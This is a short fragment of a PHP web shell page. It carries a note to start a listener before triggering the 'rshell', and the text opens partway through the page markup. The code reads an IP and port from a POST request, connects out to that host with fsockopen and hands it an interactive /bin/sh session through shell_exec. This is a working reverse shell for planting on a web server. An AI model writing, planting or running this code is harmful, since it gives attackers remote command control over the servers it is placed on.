*NOTE : Before triggring rshell, start listening
IP : PORT :".$output.""; } if (isset($_POST["ip"]) && isset($_POST["port"])) { $sock="sock"; $cmd = "php -r '$"."{$sock}"."=fsockopen("."\"{$_POST["ip"]}\"".","."{$_POST["port"]}".");shell_exec(\""."/bin/sh -i <&3 >&3 2>&3"."\");'"; if (strlen($cmd)>66) { shell_exec("{$cmd} 2>&1"); } } ?>